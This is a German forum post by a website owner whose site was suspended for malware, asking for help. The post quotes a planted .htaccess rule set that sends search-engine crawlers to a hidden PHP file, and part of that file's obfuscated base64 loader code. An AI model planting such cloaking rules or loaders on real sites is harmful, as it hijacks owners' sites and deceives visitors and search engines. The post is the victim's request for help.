Hallo,
heute wurde leider mein Website gesperrt da ein virus gefunden wurde. Ich habe online schon ähnliche Fälle ergoogelt aber noch keine Antwort gefunden was ich jetzt tun kann. Soweit ich das erfahren habe soll Wordpress oder ein Plug-In Probleme bereiten.
Im Anhang unten habe ich den Plug-In Ordner abgelichtet.
Es scheinen .htaccess und sitemap_xml_xml.php betroffen zu sein. Beide wurden laut FileZilla zuletzt zur selben Zeit editert, vor 3 Monaten.
.htaccess scheint verändert worden zu sein, das ist ja schonmal ne Sache. Geht das denn nicht nur durch den FTP Adminzugang? Die Einstellung ist auf 644.
Hier der Inhalt, der Link ist von mir etwas zensiert.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|slurp|bing|msnbot|yandex) [OR]
RewriteCond %{HTTP_REFERER} (zzzzzz)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php|phps|shtml|xml|xhtml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !sitemap_xml_xml.php
RewriteCond /var/www/USERNAME/html/WEBSITE/sitemap_xml_xml.php -f
RewriteRule ^.*$ /sitemap_xml_xml.php [L]
</IfModule>
Oder ist das so korrekt? Selbst habe ich das jedenfalls nicht reinkopiert.
Und hier die sitemap_xml_xml.php:
<?php $GLOBALS['_1283720624_']=Array(base64_decode('ZXh0ZW' .'5zaW9uX2' .'x' .'vYW' .'Rl' .'ZA=='),
usw...
;$_15=$_SERVER[_805628407(356)];$_16=l__0($_14);$_16=$GLOBALS['_1283720624_'][24](_805628407(357),l__1() ._805628407(358),$_16);print $_16;exit();}} ?>
Ist diese Sache bekannt, was kann ich tun? Bleibt mir nur der Weg alles zurückzusetzen und hoffen dass das nicht nochmal passiert?